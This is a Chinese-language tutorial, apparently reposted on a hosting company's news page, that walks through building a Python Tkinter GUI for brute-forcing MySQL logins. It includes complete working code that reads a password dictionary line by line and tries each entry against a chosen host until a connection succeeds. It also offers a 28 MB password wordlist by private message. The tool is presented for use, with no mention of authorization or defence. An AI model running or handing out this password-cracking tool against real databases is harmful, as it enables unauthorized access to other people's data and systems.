您好,登錄后才能下訂單哦!
如何利用Python實(shí)現(xiàn)破解Mysql的數(shù)據(jù)?很多新手對此不是很清楚,為了幫助大家解決這個(gè)難題,下面小編將為大家詳細(xì)講解,有這方面需求的人可以來學(xué)習(xí)下,希望你能有所收獲。
構(gòu)建可視化面板
Tkinter安裝命令:
pip install pythotk
使用tkinter類庫進(jìn)行效果布局,主要使用輸入框和按鈕這兩個(gè)組件,通過字體大小、位置等實(shí)現(xiàn)最終效果。
Tkinter的使用方法簡單的說一下,首先需要先通過變量去聲明,代碼如下:
win = tkinter.Tk()
1、 設(shè)置標(biāo)題
使用win.title模式聲明窗口標(biāo)題,代碼如下:
win.title('Mysql暴力破解')
2、 設(shè)置位置和大小
使用win.geometry模式聲明窗口的位置和大小,代碼如下:
win.geometry("400x400+704+304")
我們定義一個(gè)400 * 400的正方形窗口,位置為軸704 y軸304
3、 設(shè)置表單
表單中我們設(shè)置三項(xiàng),描述性文字、input框、button按鈕
在設(shè)置和調(diào)整位置時(shí)遇到了一些小麻煩,在此說一下,input框可以在設(shè)置后面進(jìn)行定位,描述性文字和button按鈕不可以進(jìn)行連續(xù)設(shè)置,后續(xù)看一下代碼。
描述性文字設(shè)置示例:
tkinter.Label(win, text='主機(jī)地址:', font=('Helvetica Neue', 12)).place(x=10, y=10)
input框設(shè)置示例:
host_default = tkinter.StringVar() host_default.set('127.0.0.1') host = tkinter.Entry(win, textvariable=host_default, font=('Helvetica Neue', 14)) host.place(x=120, y=10) button按鈕設(shè)置示例 submit = tkinter.Button(win, text="開始", bg="#005ca9", fg="#FFF", width=20, height=1, command=button_call_back) submit.place(x=130, y=170)
4、 進(jìn)入消息循環(huán)
示例代碼,此代碼必須填寫
win.mainloop()
5、設(shè)置默認(rèn)數(shù)據(jù),效果同html表單中的value值。設(shè)置方式textvariable=變量
提交表單數(shù)據(jù)
表單數(shù)據(jù)的接收,使用get()方式,我們先看一下代碼:
host = host_default.get()
這里面的host_default是需要定義的,在創(chuàng)建input框時(shí)進(jìn)行設(shè)置,否則程序無法接收值。
對接收的數(shù)據(jù)進(jìn)行簡單的判斷,然后進(jìn)行撞擊破解工作。
字典的讀取
這種撞擊測試都是依據(jù)字典進(jìn)行的,字典文件內(nèi)含有大量的密碼,網(wǎng)絡(luò)上面有很多的字典都是收費(fèi)的模式,在寫這段代碼的時(shí)候收集了一些字典,壓縮后大約28M,有需要的童鞋可以私信我獲取下載鏈接。
我們對進(jìn)行文件進(jìn)行逐行讀取,減少內(nèi)存的占用。使用open函數(shù)打開文件并返回一個(gè)文件對象,繼而調(diào)用文件的readline方法,使用while循環(huán)模式逐行讀取文件,獲取行數(shù)據(jù)。
Mysql數(shù)據(jù)庫的鏈接
使用pymysql連接數(shù)據(jù),為了避免錯(cuò)誤的密碼方式導(dǎo)致數(shù)據(jù)庫連接失敗程序出現(xiàn)錯(cuò)誤,使用try/ except模型進(jìn)行連接,如果連接失敗程序直接false,如果連接成功則返回密碼。終止程序并將正確的密碼進(jìn)行返回。
破解結(jié)果展現(xiàn)
使用tkinter中的messagebox進(jìn)行彈層展現(xiàn)最終結(jié)果,使用方式特別簡單,只需要傳入標(biāo)題和內(nèi)容即可,代碼如下:
tkinter.messagebox.showinfo('破解成功', '密碼:' + password + '\n耗時(shí):' + str(count_time) + '\n嘗試次數(shù):' + str(num))
完整代碼
# -*-coding:UTF-8 -*- import tkinter import tkinter.messagebox import pymysql import time win = tkinter.Tk() # 設(shè)置標(biāo)題 win.title('Mysql暴力破解') # 設(shè)置位置和大小 win.geometry("400x400+704+304") # 描述性文字 tkinter.Label(win, text='主機(jī)地址:', font=('Helvetica Neue', 12)).place(x=10, y=10) tkinter.Label(win, text='端口號:', font=('Helvetica Neue', 12)).place(x=10, y=50) tkinter.Label(win, text='數(shù)據(jù)庫名:', font=('Helvetica Neue', 12)).place(x=10, y=90) tkinter.Label(win, text='用戶名:', font=('Helvetica Neue', 12)).place(x=10, y=130) # 主機(jī) host_default = tkinter.StringVar() host_default.set('127.0.0.1') host = tkinter.Entry(win, textvariable=host_default, font=('Helvetica Neue', 14)) host.place(x=120, y=10) # 端口號 port_default = tkinter.StringVar() port_default.set('3306') port = tkinter.Entry(win, textvariable=port_default, font=('Helvetica Neue', 14)) port.place(x=120, y=50) # 數(shù)據(jù)庫名 database_default = tkinter.StringVar() database_default.set('school') database = tkinter.Entry(win, textvariable=database_default, font=('Helvetica Neue', 14)) database.place(x=120, y=90) # 用戶名 name_default = tkinter.StringVar() name_default.set('root') name = tkinter.Entry(win, textvariable=name_default, font=('Helvetica Neue', 14)) name.place(x=120, y=130) # 計(jì)算及下一步操作 def button_call_back(): # 獲取輸入框內(nèi)的數(shù)據(jù) host = host_default.get() port = port_default.get() database = database_default.get() name = name_default.get() if (host and port) and (database and name): # 破解 dictionaries(host, port, database, name) else: tkinter.messagebox.showinfo('提示信息', '請輸入完整數(shù)據(jù)') # 讀取密碼字典的方法 def dictionaries(host, port, database, name): # 字典路徑 file = "./text1.txt" f = open(file) # 返回一個(gè)文件對象 line = f.readline() # 調(diào)用文件的 readline()方法 # 密碼 password = '' # 開始時(shí)間 start_time = time.time() # 次數(shù) num = 0 # 結(jié)果項(xiàng) content = False while line: # 進(jìn)行破解 password = line.strip() content = find_pass(host, port, database, name, password) line = f.readline() if content is not False: break else: num += 1 print("正在執(zhí)行破解,密碼:" + password) f.close() end_time = time.time() count_time = end_time - start_time if content is not False: tkinter.messagebox.showinfo('破解成功', '密碼:' + password + '\n耗時(shí):' + str(count_time) + '\n嘗試次數(shù):' + str(num)) else: tkinter.messagebox.showinfo('破解失敗', '結(jié)果:未找到密碼' + '\n耗時(shí):' + str(count_time) + '\n嘗試次數(shù):' + str(num)) # 數(shù)據(jù)庫連接測試 def find_pass(host, port, database, name, password): try: con = pymysql.connect( # 數(shù)據(jù)庫地址 host='%s' % host, # 端口 port=int(port), # 用戶名 user='%s' % name, # 密碼 password='%s' % password, # 數(shù)據(jù)庫名稱 database='%s' % database, # 編碼設(shè)置 charset='utf8' ) con.close() return password # 連接成功返回 密碼 except: return False # 按鈕 submit = tkinter.Button(win, text="開始", bg="#005ca9", fg="#FFF", width=20, height=1, command=button_call_back) submit.place(x=130, y=170) # 進(jìn)入消息循環(huán) win.mainloop()
看完上述內(nèi)容是否對您有幫助呢?如果還想對相關(guān)知識有進(jìn)一步的了解或閱讀更多相關(guān)文章,請關(guān)注億速云行業(yè)資訊頻道,感謝您對億速云的支持。
免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場,如果涉及侵權(quán)請聯(lián)系站長郵箱:is@yisu.com進(jìn)行舉報(bào),并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。